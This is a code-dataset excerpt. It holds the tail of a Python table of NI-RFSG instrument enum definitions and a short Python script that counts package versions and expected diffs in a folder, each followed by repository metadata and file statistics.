'value': 'RefIn'
},
{
'documentation': {
'description': ' Use the PXI_CLK signal, which is present on the PXI backplane, as the clock source.\n'
},
'name': 'PXI_CLK',
'value': 'PXI_CLK'
},
{
'documentation': {
'description': ' Use the clock signal present at the front panel ClkIn connector as the clock source. This value is not valid for the PXIe-5644/5645/5646 or PXIe-5820/5830/5831/5831 with PXIe-5653/5840/5840 with PXIe-5653/5841/5841 with PXIe-5655. \n'
},
'name': 'CLK_IN',
'value': 'ClkIn'
},
{
'documentation': {
'description': ' This value is valid on only the PXIe-5840 with PXIe-5653. NI-RFSG locks the Reference Clock to the clock sourced at the PXIe-5840 REF IN terminal that is already configured by an NI-RFSA session. Connect the PXIe-5840 REF OUT connector to the PXIe-5653 REF IN connector. Configure open NI-RFSA sessions to the device to use NIRFSA_VAL_REF_IN_STR for the PXIe-5840 or NIRFSA_VAL_ONBOARD_CLOCK_STR for the PXIe-5840 with PXIe-5653. \n'
},
'name': 'REF_IN_2',
'value': 'RefIn2'
},
{
'documentation': {
'description': ' This value is valid on only the PXIe-5831 with PXIe-5653 and the PXIe-5840 with PXIe-5653. PXIe-5831 with PXIe-5653—NI-RFSG configures the PXIe-5653 to export the Reference clock and configures the PXIe-5820 and PXIe-3622 to use NIRFSG_VAL_PXI_CLK_STR as the Reference Clock source. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXI chassis REF IN connector. \n PXIe-5840 with PXIe-5653—NI-RFSG configures the PXIe-5653 to export the Reference Clock, and configures the PXIe-5840 to use NIRFSG_VAL_PXI_CLK_STR. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXI chassis REF IN connector. For best performance, configure all other devices in the system to use NIRFSG_VAL_PXI_CLK_STR as the Reference Clock source. \n'
},
'name': 'PXI_CLK_MASTER',
'value': 'PXI_ClkMaster'
}
]
},
'RelativeTo': {
'values': [
{
'name': 'START_OF_WAVEFORM',
'value': 8000
},
{
'name': 'CURRENT_POSITION',
'value': 8001
}
]
},
'ResetOptions': {
'values': [
{
'documentation': {
'description': ' NI-RFSG resets all the configurations.'
},
'name': 'SKIP_NONE',
'value': 0
},
{
'documentation': {
'description': ' NI-RFSG skips resetting the waveform configurations.'
},
'name': 'SKIP_WAVEFORMS',
'value': 1
},
{
'documentation': {
'description': ' NI-RFSG skips resetting the scripts.'
},
'name': 'SKIP_SCRIPTS',
'value': 2
},
{
'documentation': {
'description': ' NI-RFSG skips resetting the de-embedding tables.'
},
'name': 'SKIP_DEEMBEDING_TABLES',
'value': 8
}
]
},
'ResetWithOptionsStepsToOmit': {
'values': [
{
'name': 'NONE',
'value': 0
},
{
'name': 'WAVEFORMS',
'value': 1
},
{
'name': 'SCRIPTS',
'value': 2
},
{
'name': 'ROUTES',
'value': 4
},
{
'name': 'DEEMBEDDING_TABLES',
'value': 8
}
]
},
'RfInLoExportEnabled': {
'values': [
{
'name': 'UNSPECIFIED',
'value': -2
},
{
'name': 'DISABLE',
'value': 0
},
{
'name': 'ENABLE',
'value': 1
}
]
},
'RoutedSignal': {
'values': [
{
'name': 'CONFIGURATION_LIST_STEP_TRIGGER',
'value': 6
},
{
'name': 'CONFIGURATION_SETTLED_EVENT',
'value': 7
},
{
'name': 'DONE_EVENT',
'value': 5
},
{
'name': 'MARKER_EVENT',
'value': 2
},
{
'name': 'REF_CLOCK',
'value': 3
},
{
'name': 'SCRIPT_TRIGGER',
'value': 1
},
{
'name': 'STARTED_EVENT',
'value': 4
},
{
'name': 'START_TRIGGER',
'value': 0
}
]
},
'SParameterOrientation': {
'values': [
{
'name': 'PORT1_TOWARDS_DUT',
'value': 24000
},
{
'name': 'PORT2_TOWARDS_DUT',
'value': 24001
}
]
},
'ScriptTriggerType': {
'values': [
{
'documentation': {
'description': ' Setting trigger attributes to this value specifies that no trigger is configured. Signal generation starts immediately. \n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' The data operation does not start until a digital edge is detected. The source of the digital edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_SCRIPT_TRIGGER_SOURCE attribute, and the active edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_SCRIPT_TRIGGER_EDGE attribute. \n'
},
'name': 'DIGITAL_EDGE',
'value': 1
},
{
'documentation': {
'description': ' The data operation does not start until a digital level is detected. The source of the digital level is specified in the NIRFSG_ATTR_DIGITAL_LEVEL_SCRIPT_TRIGGER_SOURCE attribute, and the active level is specified in the NIRFSG_ATTR_DIGITAL_LEVEL_SCRIPT_TRIGGER_ACTIVE_LEVEL attribute. \n'
},
'name': 'DIGITAL_LEVEL',
'value': 8000
},
{
'documentation': {
'description': ' The data operation does not start until a software event occurs. You may create a software event by calling the niRFSG_SendSoftwareEdgeTrigger function. \n'
},
'name': 'SOFTWARE',
'value': 2
}
]
},
'SelfCalibrateRangeStepsToOmit': {
'values': [
{
'name': 'OMIT_NONE',
'value': 0
},
{
'name': 'LO_SELF_CAL',
'value': 1
},
{
'name': 'POWER_LEVEL_ACCURACY',
'value': 2
},
{
'name': 'RESIDUAL_LO_POWER',
'value': 4
},
{
'name': 'IMAGE_SUPPRESSION',
'value': 8
},
{
'name': 'SYNTHESIZER_ALIGNMENT',
'value': 16
}
]
},
'SignalIdentifier': {
'generate-mappings': True,
'values': [
{
'name': 'NONE',
'value': ''
},
{
'name': 'SCRIPT_TRIGGER0',
'value': 'scriptTrigger0'
},
{
'name': 'SCRIPT_TRIGGER1',
'value': 'scriptTrigger1'
},
{
'name': 'SCRIPT_TRIGGER2',
'value': 'scriptTrigger2'
},
{
'name': 'SCRIPT_TRIGGER3',
'value': 'scriptTrigger3'
},
{
'name': 'MARKER0',
'value': 'marker0'
},
{
'name': 'MARKER1',
'value': 'marker1'
},
{
'name': 'MARKER2',
'value': 'marker2'
},
{
'name': 'MARKER3',
'value': 'marker3'
}
]
},
'StartTriggerType': {
'values': [
{
'documentation': {
'description': ' Setting trigger attributes to this value specifies that no trigger is configured. \n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' The data operation does not start until a digital edge is detected. The source of the digital edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_SOURCE attribute, and the active edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_EDGE attribute. \n'
},
'name': 'DIGITAL_EDGE',
'value': 1
},
{
'documentation': {
'description': ' The data operation does not start until a software event occurs. You may create a software event by calling the niRFSG_SendSoftwareEdgeTrigger function. \n'
},
'name': 'SOFTWARE',
'value': 2
},
{
'documentation': {
'description': ' Data operation does not start until the endpoint reaches a threshold specified in the NIRFSG_ATTR_P2P_ENDPOINT_FULLNESS_START_TRIGGER_LEVEL attribute. \n'
},
'name': 'P2_P_ENDPOINT_FULLNESS',
'value': 3
}
]
},
'TriggerSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PFI 2 on the front panel DDC connector.\n'
},
'name': 'PFI2',
'value': 'PFI2'
},
{
'documentation': {
'description': ' PFI 3 on the front panel DDC connector.\n'
},
'name': 'PFI3',
'value': 'PFI3'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXI trigger line 7.\n'
},
'name': 'PXI_TRIG7',
'value': 'PXI_Trig7'
},
{
'documentation': {
'description': ' PXI Star trigger line. This value is not valid on the PXIe-5644/5645/5646.\n'
},
'name': 'PXI_STAR',
'value': 'PXI_STAR'
},
{
'documentation': {
'description': ' PXIe DStar B trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841. \n'
},
'name': 'PXIE_DSTARB',
'value': 'PXIe_DStarB'
},
{
'documentation': {
'description': ' Sync Start trigger line.'
},
'name': 'SYNC_START_TRIGGER',
'value': 'Sync_Start'
},
{
'documentation': {
'description': ' Sync script trigger line.'
},
'name': 'SYNC_SCRIPT_TRIGGER',
'value': 'Sync_Script'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_IN',
'value': 'TrigIn'
}
]
},
'UpconverterFrequencyOffsetMode': {
'values': [
{
'documentation': {
'description': ' NI-RFSG places the upconverter center frequency outside of the signal bandwidth if the NIRFSG_ATTR_SIGNAL_BANDWIDTH attribute has been set and can be avoided. '
},
'name': 'AUTO',
'value': -1
},
{
'documentation': {
'description': ' NI-RFSG places the upconverter center frequency outside of the signal bandwidth if the NIRFSG_ATTR_SIGNAL_BANDWIDTH attribute has been set and can be avoided. NI-RFSG returns an error if unable to avoid the specified signal bandwidth, or if the NIRFSG_ATTR_SIGNAL_BANDWIDTH attribute has not been set. '
},
'name': 'ENABLE',
'value': 1
},
{
'documentation': {
'description': ' NI-RFSG uses the offset that you specified with the NIRFSG_ATTR_UPCONVERTER_FREQUENCY_OFFSET or NIRFSG_ATTR_UPCONVERTER_CENTER_FREQUENCY attributes. '
},
'name': 'USER_DEFINED',
'value': 5001
}
]
},
'WriteWaveformBurstDetectionMode': {
'values': [
{
'documentation': {
'description': ' NI-RFSG automatically detects the burst start and burst stop locations by analyzing the waveform.'
},
'name': 'AUTO',
'value': -1
},
{
'documentation': {
'description': ' User sets the burst detection parameters.'
},
'name': 'MANUAL',
'value': 0
}
]
},
'YigMainCoil': {
'values': [
{
'documentation': {
'description': ' Adjusts the YIG main coil for an underdampened response. \n'
},
'name': 'SLOW',
'value': 0
},
{
'documentation': {
'description': ' Adjusts the YIG main coil for an overdampened response. \n'
},
'name': 'FAST',
'value': 1
}
]
}
}
| 34.090381 | 1,071 | 0.40013 | 4,854 | 64,499 | 5.230326 | 0.129378 | 0.174886 | 0.055538 | 0.049551 | 0.652395 | 0.59922 | 0.556759 | 0.517922 | 0.477982 | 0.425713 | 0 | 0.039258 | 0.492907 | 64,499 | 1,891 | 1,072 | 34.108408 | 0.736662 | 0 | 0 | 0.350079 | 0 | 0.019038 | 0.4441 | 0.034373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1591fda0bf27adaef74f6f31a6d8012b1ea509fa | 676 | py | Python | utilities/calculate_missing_diffs.py | SafeBreach-Labs/Back2TheFuture | 39b5eaf289e694aa9cae1bd26fd1f35b0d4dd0c3 | [
"BSD-3-Clause"
] | 84 | 2021-08-07T02:39:50.000Z | 2022-03-18T13:20:43.000Z | utilities/calculate_missing_diffs.py | SafeBreach-Labs/Back2TheFuture | 39b5eaf289e694aa9cae1bd26fd1f35b0d4dd0c3 | [
"BSD-3-Clause"
] | null | null | null | utilities/calculate_missing_diffs.py | SafeBreach-Labs/Back2TheFuture | 39b5eaf289e694aa9cae1bd26fd1f35b0d4dd0c3 | [
"BSD-3-Clause"
] | 13 | 2021-08-07T15:53:08.000Z | 2022-02-02T14:23:06.000Z | # (CWD: executables/amd64 folder)
# TODO: finish this
import os

# Collect the path of every package directory in the current folder.
packages = []
total_executables_packages = len(os.listdir("."))
for package_name in os.listdir("."):
    packages.append(os.path.join(".", package_name))

# A package with N versions yields N - 1 expected consecutive diffs;
# a package with a single version cannot be diffed at all.
without_diffs = []
expected_diffs = 0
for package_path in packages:
    match_found = os.listdir(package_path)
    if len(match_found) >= 2:
        expected_diffs += len(match_found) - 1
        continue
    without_diffs.append(package_path)

print("total amount of packages: {}".format(total_executables_packages))
print("total packages with only 1 version: {}".format(len(without_diffs)))
print("total amount of expected diffs: {}".format(expected_diffs)) | 37.555556 | 74 | 0.724852 | 91 | 676 | 5.186813 | 0.406593 | 0.110169 | 0.101695 | 0.076271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010327 | 0.140533 | 676 | 18 | 75 | 37.555556 | 0.802065 | 0.072485 | 0 | 0 | 0 | 0 | 0.1648 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.1875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
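The diff-counting logic above can be sketched as a self-contained function. This is an illustrative refactoring, not part of the original script: the function name `count_expected_diffs` and the temporary directory layout are assumptions made for the example.

```python
import os
import tempfile


def count_expected_diffs(executables_dir):
    """Return (packages with a single version, number of expected
    consecutive diffs across all multi-version packages)."""
    without_diffs = []
    expected_diffs = 0
    for package_name in os.listdir(executables_dir):
        package_path = os.path.join(executables_dir, package_name)
        versions = os.listdir(package_path)
        if len(versions) >= 2:
            # N versions of a package yield N - 1 consecutive diffs.
            expected_diffs += len(versions) - 1
        else:
            without_diffs.append(package_path)
    return without_diffs, expected_diffs


# Build a throwaway layout: pkg_a has 3 versions, pkg_b has only 1.
with tempfile.TemporaryDirectory() as root:
    for pkg, n_versions in {"pkg_a": 3, "pkg_b": 1}.items():
        for i in range(n_versions):
            os.makedirs(os.path.join(root, pkg, "v{}".format(i)))
    singles, diffs = count_expected_diffs(root)
    print(len(singles), diffs)  # prints "1 2"
```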